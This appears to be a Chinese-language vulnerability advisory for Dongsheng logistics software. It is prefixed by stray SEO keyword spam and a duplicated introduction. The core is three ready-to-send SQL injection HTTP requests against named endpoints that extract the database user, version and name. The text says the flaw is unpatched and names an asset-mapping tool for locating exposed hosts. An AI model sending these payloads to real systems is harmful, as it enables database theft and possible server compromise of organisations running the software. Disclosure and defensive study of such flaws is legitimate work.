网站地图做关键词排名,设计师门户网站程序,网上卖东西怎么才能卖得好,wordpress集成vue0x01 产品简介 东胜物流软件是一款致力于为客户提供IT支撑的 SOP#xff0c; 帮助客户大幅提高工作效率#xff0c;降低各个环节潜在风险的物流软件。
0x02 漏洞概述
东胜物流软件 TCodeVoynoAdapter.aspx、/TruckMng/MsWlDriver/GetDataList、/MvcShipping/MsBaseInfo/Sav…0x01 产品简介 东胜物流软件是一款致力于为客户提供IT支撑的 SOP 帮助客户大幅提高工作效率降低各个环节潜在风险的物流软件。
0x02 漏洞概述
东胜物流软件 TCodeVoynoAdapter.aspx、/TruckMng/MsWlDriver/GetDataList、/MvcShipping/MsBaseInfo/SaveUserQuerySetting等接口处存在 SQL 注入漏洞攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息例如管理员后台密码、站点的用户个人信息之外甚至在高权限的情况可向服务器中写入木马进一步获取服务器系统权限。
0x03 复现环境
微步资产测绘app东胜物流软件
0x04 漏洞复现
PoC-1
GET /FeeCodes/TCodeVoynoAdapter.aspx?mask0pos0strVESSEL1%27anduser%3E0%3B-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
查询当前用户 PoC-2
GET /TruckMng/MsWlDriver/GetDataList?_dc1665626804091start0limit30sortcondition123IN(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2bCHAR(32)%2b(select%40%40version)%2bCHAR(32)%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113))--%20page1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
查询数据库版本 PoC-3
POST /MvcShipping/MsBaseInfo/SaveUserQuerySetting HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charsetUTF-8
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15formnameMsRptSaleBalProfitShareIndexAND2523IN(SELECT(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2b(SELECTSUBSTRING((ISNULL(CAST((db_name%28%29)ASNVARCHAR(4000)),CHAR(32))),1,1024))%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)))ANDuKco%3duKcoisvisibletrueissavevaluetruequerydetail%7B%22PS_MBLNO%22%3A%22%22%2C%22PS_VESSEL%22%3A%22%22%2C%22PS_VOYNO%22%3A%22%22%2C%22PS_SALE%22%3A%22%5Cu91d1%5Cu78ca%22%2C%22PS_OP%22%3Anull%2C%22PS_EXPDATEBGN%22%3A%222020-02-01%22%2C%22PS_EXPDATEEND%22%3A%222020-02-29%22%2C%22PS_STLDATEBGN%22%3A%22%22%2C%22PS_STLDATEEND%22%3A%22%22%2C%22PS_ACCDATEBGN%22%3A%22%22%2C%22PS_ACCDATEEND%22%3A%22%22%2C%22checkboxfield-1188-inputEl%22%3A%22on%22%2C%22PS_CUSTSERVICE%22%3Anull%2C%22PS_DOC%22%3Anull%2C%22hiddenfield-1206-inputEl%22%3A%22%22%7D} 查询当前数据库 0x05 修复建议
官方暂未修复该漏洞请用户联系厂商修复漏洞http://www.dongshengsoft.com/
部署Web应用防火墙对数据库操作进行监控。
如非必要禁止公网访问该系统。
